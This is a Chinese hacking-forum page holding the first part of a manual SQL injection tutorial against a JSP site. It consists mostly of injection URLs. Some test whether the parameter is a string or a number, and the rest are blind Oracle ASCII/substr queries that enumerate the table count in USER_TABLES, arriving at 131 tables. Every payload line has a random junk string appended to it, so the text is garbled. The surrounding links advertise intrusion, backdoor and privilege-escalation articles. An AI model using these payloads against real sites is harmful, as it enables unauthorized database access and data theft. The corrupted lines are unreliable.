·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]手工注入jsp学习(小榕关门弟子作业一)

热荐 ★★★★★

手工注入jsp学习(小榕关门弟子作业一)

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2006-7-23 9:41:18

1、判断注入类型（数字型还是字符型） CQ+>14B7
字符型和数字型数据判断：（希望有人能进一步的细化，细分为数字型和字符型判断两部分） nZB9x
http://www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0) X=s%[O GxT
http://www.test.net/index_kaoyan_view.jsp?id=117 And user<char(0) x"Ly
http://www.test.net/index_kaoyan_view.jsp?id=117’ And user>char(0) And ’1’=’1 ~rqIrMGD:$
http://www.test.net/index_kaoyan_view.jsp?id=117’ And user<char(0) And ’1’=’1 `+$) m+6nO
http://www.test.net/index_kaoyan_view.jsp?id=117’ And user>char(0) And ’%25’=’ 16S&v"w,
http://www.test.net/index_kaoyan_view.jsp?id=117’ And user<char(0) And ’%25’=’ 8x;S
http://www.test.net/index_kaoyan_view.jsp?id=117) And user>char(0) And 1 in(1 qZJ%Xvw
http://www.test.net/index_kaoyan_view.jsp?id=117) And user<char(0) And 1 in(1 ^~O(-'p/
http://www.test.net/index_kaoyan_view.jsp?id=117’) And user>char(0) And (’ ’)=(’ ^4UT=
http://www.test.net/index_kaoyan_view.jsp?id=117’) And user<char(0) And (’ ’)=(’ FSz;+K9
http://www.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97) B%59T}"
http://www.test.net/index_kaoyan_view.jsp?id=117 And str(98)<str(97) pG{:RU<sbT
(>WU)[
http://www.test.net/index_kaoyan_view.jsp?id=117’ And str(98)>str(97) And ’1’=’1 v))gB3tph
http://www.test.net/index_kaoyan_view.jsp?id=117’ And str(98)<str(97) And ’1’=’1 &V 6*AISw
FO>yRGt
http://www.test.net/index_kaoyan_view.jsp?id=117’ And str(98)>str(97) And ’%25’=’ SFC}'=5O#
O@i&?\7
　　 tSUwKBD%#
Fez~~'TSO/
http://www.test.net/index_kaoyan_view.jsp?id=117’ And user<char(0) And ’%25’= Y]`W "B
http://www.test.net/index_kaoyan_view.jsp?id=117’ And str(98)<str(97) And ’%25’=’ `| ~{u (\
:p>iSL~zU]
http://www.test.net/index_kaoyan_view.jsp?id=117) And str(98)>str(97) And 1 in(1 AuH-Dv <w
http://www.test.net/index_kaoyan_view.jsp?id=117) And str(98)<str(97) And 1 in(1 Tt1&
http://www.test.net/index_kaoyan_view.jsp?id=117’) And str(98)>str(97) And (’ ’)=(’ uom}L2gy
http://www.test.net/index_kaoyan_view.jsp?id=117’) And str(98)<str(97) And (’ ’)=(’ e+% %
<x5skAex]'
出现正常的页面： 26/s
http://www.test.net/index_kaoyan_view.jsp?id=117 And USER>CHR(0) &tmkwO}}#
http://www.test.net/index_kaoyan_view.jsp?id=117 And USER<CHR(0) 2AcR.=A" J
GI~Z_wDLcw
2、猜解表数量和表名 Mtp>^~*K3
T q58r
数据库数量为3： ] E)^&%a_~
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) u/354Xz>R
;rMw:yA=
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) u[qtHpf =
0}bF3h!`w
http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) 5W )7~CYj
OX ^dZV$(
http://www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) B8"j P F
*1}|FsOc3
http://www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) DN\kOE#
800lwg7
http://www.test.net/index_kaoyan_view.jsp?id=117 And UNISTR(1)>UNISTR(0) vlCNi` -
~q@_^q `>
以下为猜解数据表数量 jOxc~Sd
数据表第一位为：1 IFPaJ14"$b
~SlA^I:@
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1)) u~L)\|X-
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1)) ~e T2&w
09x_M9Ph
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1)) @ U-b ^?<>
|\[M$0Ac
U7B%G?P
数据表第二位为：3 -2u TmtDa
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) -[[.l=
0Q}&SCR1'
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) }e+?A^
kaKbnJ
http://www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) m/pl_V!&`
http://www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) Gx,D{4P
9CcilA/l
http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) j;0a36:~H
Z>u Rw3T
http://www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) @;u}.)i%
kuh.c#
http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) H -a;
}OG\H8/{
http://www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) D{!0fIaxZ
:W:s &/\
http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) L OnBq-e9
7s d?qgj
http://www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) ~:?En.$
,T+B5R8%
http://www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) q`s|V*+h(_
f}sJQ 7
http://www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) :KA:GYHfC
8nmS;o
http://www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) @{ W$
9ia<=_EM;
http://www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) #m?_U" Fk
W%?w_#{X6
http://www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) l&c;VRBE
h)JcW}T
http://www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) /3| Q4c
uh& 3, Y@
http://www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) Fhn2 S04
,oH2s*rkq
http://www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) </aXd'6
5!8;9}
http://www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) x*=# cL*JK
#bk:,7'l`
http://www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) eA)gkVld
dDz^`z
http://www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) u:>mK-
!KObt4G
数据表第三位为：1 5]tQ~]+8b
http://www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) a6g3"AHm-
`MWVa?k"#a
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) qq.cdr
yr+C)K|rq
http://www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) y*sUt2l`
t &^/,8u|
http://www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) eTkln3D_'Y
G>EU=1`>
http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) gFA4@LU,|c
x0V^GR!
http://www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) $a:";T
|KR07:
http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) .~bys/
@E%;!I
http://www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) -RE,gn
kHlc| ;.
http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) p_qXNHBh
N} $:,R}
http://www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) fJ[o8-
#c-< (Dp;
http://www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) -}bKmNNhb
r kj{D3
http://www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) 5$@OU{
kO4%+'3:x
http://www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) L- aGkdp
lV M`0AYd
http://www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) wQbnh9 ,
b]7o0r | N
http://www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) }<M Iz
M !x};\,
http://www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) R"(o#t+
(d <_3X4\N
http://www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) A(_vx
7TL>
http://www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) uxvtgDD1
&GAL&OyB
http://www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) _5*5J V
D"<5;_?
http://www.test.net/index_kaoyan_view.jsp?id=117 And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) 94q*] e|
z1JXG!7$*
http://www.test.net/index_kaoyan_view.jsp?id=117 And 54>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) J-K Dl
:lG~l<}t
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) Q}^pzR,s
Fh3'j(t/M
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) eC}qN\tX
37lCAHFR^e
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) ?V)x*8
d]2w k
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) #8+2("+Nh
e-D=2
共有131个数据表，见以上数据。 Qujj:Aw

[1] [2] [3] 下一页

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：手动注入脚本命令精华版

下一篇文章：两个有用的DOS命令

【字体：小大】

中介交易区

入侵网站必备经典语句	01-17
说说session	10-23
新or注入教程	09-10
Mssql2005注入命令总结	07-30
阿D常用注入命令汇总	07-30
Penetration Testing 渗透测试	07-04
Exploit Sites 和0day公布的站点	06-18
3389得到肉鸡后的命令	06-18
Cmd模式下的入侵技术大全	05-30
阿D常用注入命令整理	05-17
opendatasource学习记录	05-14
SQL Injection规避入侵检测技术总	05-06